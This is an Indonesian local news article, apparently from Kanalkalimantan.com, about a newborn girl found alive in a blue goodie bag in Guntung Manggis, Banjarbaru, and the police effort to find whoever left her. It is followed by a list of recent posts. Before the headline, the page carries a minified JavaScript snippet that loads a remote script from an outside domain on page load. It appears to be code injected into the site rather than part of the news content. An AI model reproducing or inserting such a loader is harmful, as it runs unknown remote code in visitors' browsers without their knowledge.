(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Bayi Dibuang dalam Tas Jinjing di Guntung Manggis, Pelaku Diburu Polisi


KANALKALIMANTAN.COM, BANJARBARU – Bayi berjenis kelamin perempuan yang ditemukan di Jalan Kebun Durian Guntung Manggis RT 18 RW 003, Kelurahan Guntung Manggis, Kecamatan Landasan Ulin, Kota Banjarbaru, Rabu (12/4/2023) dini hari, masih dalam perawatan tim medis RSD Idaman Banjarbaru.

Bayi perempuan yang diperkirakan baru lahir tidak lebih dari 24 jam tubuhnya hanya dibalut satu kain warna putih coklat -sarung perempuan-.

Tubuh bayi yang dibalut kain sarung itu dimasukkan ke dalam tas jinjing atau goodie bag berwarna biru. Ditemukan sekitar pukul 03.40 Wita, bayi tersebut masih dalam keadaan hidup.

Kapolres Banjarbaru AKBP Dody Harza Kusumah melalui Kasi Humas Polres Banjarbaru Kompol Tajudin Noor dengan tegas mengatakan akan memburu pelaku yang tega menaruh bayi perempuan tersebut.

 

Baca juga: Bayi Dibuang di Guntung Manggis, Dibungkus Goodie Bag, Tali Pusar Dipasang Penjepit Kertas

“Kami kepolisian lakukan penyelidikan,” tegasnya.

Diungkapkan Kompol Tajudin, kepolisian akan mengusut tuntas kasus ini, langkah pertama yang akan ditempuh dengan mengumpulkan saksi-saksi di lapangan.

Tas jinjing warna biru yang digunakan sebagai pembungkus bayi perempuan yang dibuang. Foto: polresbjb

Sementara untuk kondisi bayi perempuan saat ini suhu tubuhnya sudah normal dengan saturasi 92 persen, kemudian diberikan oksigen 1/2 liter dan naik menjadi 100 persen.

“Berat bayi 1,5 Kg, bayinya akan dilakukan pemasangan infus oleh medis,” sebutnya.

Sebelumnya, bayi perempuan ditemukan salah seorang warga, Erna yang kemudian Erna melaporkan penemuannya kepada Babinsa Guntung Manggis Sertu Sudarsono.

Bayi perempuan tersebut diletakkan dalam sebuah goodie bag warna biru dan tubuhnya dibalut dengan kain warna putih coklat atau sarung khusus perempuan.

Baca juga: BREAKING NEWS. Bayi Dibuang Dini Hari, Ditemukan Dekat Kebun Durian di Guntung Manggis

Penemuan bayi ini tidak jauh dari permukiman warga dan kebun durian. Saat ditemukan keadaan bayi terbilang cukup bersih dengan ari-ari sudah tidak ada.

Selain itu, kondisi bayi masih merah dan posisi pusar sudah terpotong. Sedangkan untuk tali pusar dipasangi dengan penjepit buku dan penahan kertas.

Diperkirakan pelaku meletakkan bayi di dekat rumah Erna agar dapat mengasuh bayinya, pelaku mengira Erna pengasuh dari Panti Asuhan Ar Rahmah. (Kanalkalimantan.com/ibnu)

Reporter : ibnu
Editor : bie


Risa

Recent Posts

21 Mei: Sejarah Hari Peringatan Reformasi nasional

KANALKALIMANTAN.COM - Hari Reformasi Nasional diperingati setiap 21 Mei, menjadi momen pengingat seluruh masyarakat Indonesia… Read More

5 jam ago

Syarat Dukungan Ditolak, Bakal Calon Perseorangan Pilwali Banjarmasin Ajukan Sengketa ke Bawaslu

KANALKALIMANTAN.COM, BANJARMASIN - Di awal tahapan Pemilihan Wali Kota dan Wakil Wali Kota (Pilwali) Banjarmasin… Read More

16 jam ago

ETLE Segera Terpasang di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Sejumlah titik krusial pelanggaran lalu lintas dan kerawanan kecelakaan lalu lintas menjadi… Read More

16 jam ago

Dinas PUPR Kalsel Gelar Bimtek Pengelolaan Air Limbah

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Pekerjaan Umum dan Penataan Ruang (PUPR) Provinsi Kalsel mengadakan kegiatan Bimbingan… Read More

17 jam ago

Rekomendasi Partai Tak Pasti, Jaya-Abdi Siap Jadi Penantang Petahana Aditya-Yuti

Jaya : Penantang Bisa Lebih dalam Mengevaluasi Kinerja Petahana Read More

17 jam ago

Lima Jabatan di Polres Banjarbaru Rotasi, 12 Personel Terima Penghargaan Kapolda

KANALKALIMANTAN.COM, BANJARBARU - Lima jabatan yang diisi para perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

19 jam ago

This website uses cookies.